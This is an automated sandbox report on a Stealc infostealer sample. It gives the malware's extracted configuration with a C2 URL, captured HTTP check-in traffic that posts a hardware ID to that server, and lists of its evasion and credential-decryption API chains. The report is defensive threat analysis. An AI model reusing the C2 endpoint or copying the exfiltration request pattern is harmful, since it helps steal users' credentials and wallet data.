Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560661
MD5:fcab8c77edd9c235497e92d29b6c028d
SHA1:5bea36fb1edcb3801f5f7d5dacda5d0ffd5ac020
SHA256:ece1bbf67dbee347fca668310d9fcf40f8e736d56bc81fb97e5f12f0d08ab3cb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FCAB8C77EDD9C235497E92D29B6C028D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5480JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5480JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T05:16:23.817626+010020442431Malware Command and Control Activity Detected192.168.2.649726185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpKAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.5480.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for domain / URL
              Source: http://185.215.113.206/c4becf79229cb002.phpKVirustotal: Detection: 18%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 44%
              Source: file.exeVirustotal: Detection: 51%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00394C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003B40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003960D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003960D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003A6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0039EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00399B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003A6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00399B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00397750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003916A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49726 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 37 39 43 39 43 43 31 41 37 33 31 35 34 36 30 38 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="hwid"7779C9CC1A731546086603------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build"mars------HDAKJDHIEBFIIDGDGDBA--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00394C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 37 39 43 39 43 43 31 41 37 33 31 35 34 36 30 38 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="hwid"7779C9CC1A731546086603------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build"mars------HDAKJDHIEBFIIDGDGDBA--
              Source: file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2325828976.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/B
              Source: file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
              Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
              Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/p
              Source: file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206~
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00399770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007498100_2_00749810
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B48B00_2_003B48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065914D0_2_0065914D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD9460_2_007CD946
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074B9DF0_2_0074B9DF
